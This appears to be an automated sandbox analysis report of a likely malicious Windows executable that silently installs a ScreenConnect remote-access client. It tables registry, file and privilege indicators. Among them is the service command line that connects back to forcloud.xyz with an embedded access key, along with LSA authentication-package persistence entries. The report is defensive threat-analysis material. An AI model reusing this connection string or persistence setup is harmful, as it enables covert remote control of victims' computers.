Analysis Overview
SHA256
5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3
Threat Level: Likely malicious
The file 5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe was found to be: Likely malicious.
Malicious Activity Summary
Sets service image path in registry
Executes dropped EXE
Event Triggered Execution: Component Object Model Hijacking
Loads dropped DLL
Checks computer location settings
Enumerates connected drives
Boot or Logon Autostart Execution: Authentication Package
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Uses Volume Shadow Copy service COM API
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 17:06
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 17:06
Reported
2024-11-13 17:09
Platform
win10v2004-20241007-en
Max time kernel
111s
Max time network
140s
Command Line
Signatures
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (20ae101cef0f1acf)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=92e7fd01-fc29-45eb-8a0d-d62071f48800&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAnoPzfbU0UESngtSsivoO5gAAAAACAAAAAAAQZgAAAAEAACAAAACMXUi7ETvxIB%2bqn0%2f4S0iNfqKstNOmK8Ytl0mIiAc5wAAAAAAOgAAAAAIAACAAAAAWpEL%2bTZN7p2UOT%2fi7hX4VRRV6qFZzedY0sji3HVAdpqAEAAD7aSvNJLP2ZQ6swvThoUS52GUH%2bUF9UIpZPvVglRWbjOXKtq3FqdZ0Qg%2fYtuEDhFLX2yCI4eUVbKjtG%2blhrt9nES5pa5XjHAKqrggXThuZCXqAnZjhJDySakpBIOoeBTCslxvDZBqNsqIVbUl5v%2fFAwPb4TWiThCQF6t1SnE3LDhCKe5ExVTUACx4DBhZpxSnokagxeOXZNY1FU7ymTz8fwOOAWZLQ6Xw%2fvEL6xjsYaWFSeZfrAWsrs8Prs7X005eTmWf77Q%2bTrzY5OA5WG%2fCQrVA%2fmL5l4EYdAyZwZsuD72uWuQGITDKLgegmsXVRmlX%2f9I9dcjcjgi4T5xhzVQH9ca6t%2fGwFRKtuj7RslmhMCEhLTe3%2fXtcsKrLnj0GOsVn0vA9jK4T%2b79nij%2b7Xmou8XaG3G5YGxcSvUbopu11X4Pj3tpgqz3cjY%2fYQAchy5YQFMR3n0ClhsGissNx0sYzpfxhUDOoZpG%2fGUGYnvUrf1UULm4%2fNuuJiV0KOicLLJcqEnKcV1oiR4k6IKgLe%2fu6%2fb%2fE0D%2foeUbzWnVw8f8%2bTe28t5GiIdduZ0TxtpNJObGbo4cYmSQQoskPyv%2fEIbfA2MT2IaRuTDlwQUpWZCv%2bGaOlXeoKXEmXkGHlq%2f6ym2xYBfCDWEPAwStn8vgJQQ0cmZX6xz%2fFSgUcd0NPJCqpp0kFtVvsVwnmHTxv7StgkiL33NYxYQZmjBOF4DcYBaZ8EUDwfk%2b%2f7cWLcUnrBkdeju1voWqaLga%2frU%2foPgW2%2b10aJofoLcwdtHG%2fipG9tA4K1CnfP9Pqm%2bQmtMMWt8g3SWyBRZZjfKiErFi7Q0GN9PQheK9gaMVFlisKGMvLBU4WZXSu7vmIh4kunw3Jj1Dc5WPxmwtUo%2bkcdCAAzFwRjbPHXvAafCeXIQUMdPz5GXQvq6RAXOqJPJuK2fx0M6HtdVwAFuMrEFG4cpgx%2bN6Uawns%2bMftnROnGB9VHr0J%2fcWixSmpfIisvg9BoSq2gT%2b3%2bFLpiN33h6ipP4PGOkCMeA8xVGghaqFtyyeW1BU1zVOZmwaLQ1t42ARQ5EFxbiFOSzrjByEcAD%2fFAPo3IXfE22nv7OaCW2mIjOSbjCycp2EyB1arYek%2bZcZ3nHMX77RKK8ZcTaBDBdVUMYZym7NOkjwUn3jyG2zRzT%2bZPyt0frEOqgjafpgvMJ5RhgjlaRGy%2fOWOMGa%2flgsAS9mxIFdFeR4cQlqfzdbjd%2fc2vJn%2fcikNtbwtt7csWOFpTXeD5s2L%2fZJr2Pd0%2bN12ysbuTkhHkSU78FpB%2fwmzOzFx9DwmSZEMtW%2bJzQCI2VcA%2bbGenbiZhzKtDkNpWLlyqkUkRC5CHoMAUG7M2RX9ZNtZu2ibEqHZ6ib1kgOLVykT3CyatN%2bPvtDRkxgo32Ll994NOA7hmBPmJMydHJKnBTfavNV7yXqG9lj9ClHU4C%2bEsbcrtnDt5wJH9cAzgoNiTWlfC9Z55sn%2bPhwoGxYXna4Uo88%2b0l9hbBKiG0sX87Fs6EQCqdM9cJ8bJQSsji1427sZs%2fJ0%2bapcgu3X1dQPLJJRA%2fZyS930D5qdAd0uRs1DwWtI4JIuLZUAAAAAHwzA80IduPMKF5viypC0RW9XUib4Dgd0qcpeUKvpEMTdH%2b9Y%2b4A5MJC2MH1agmEObt4M0YDlW2%2blt1zwcvvML&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c=\"" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe | N/A |
Loads dropped DLL
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
Boot or Logon Autostart Execution: Authentication Package
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800320030006100650031003000310063006500660030006600310061006300660029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSIFD1E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{27FF5BC2-C647-2B99-83BE-DDEA87E94140}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\e57fbb7.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57fbb5.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e57fbb5.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFCCF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI136.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{27FF5BC2-C647-2B99-83BE-DDEA87E94140} | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = (value omitted) | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC\2CB5FF72746C99B238EBDDAE789E1404 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\ = "ScreenConnect Client (20ae101cef0f1acf) Credential Provider" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Version = "402718729" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductIcon = "C:\\Windows\\Installer\\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\\DefaultIcon" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\PackageName = "setup.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F} | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\PackageCode = "2CB5FF72746C99B238EBDDAE789E1404" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsCredentialProvider.dll" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\URL Protocol | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\UseOriginalUrlEncoding = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404\Full | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductName = "ScreenConnect Client (20ae101cef0f1acf)" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
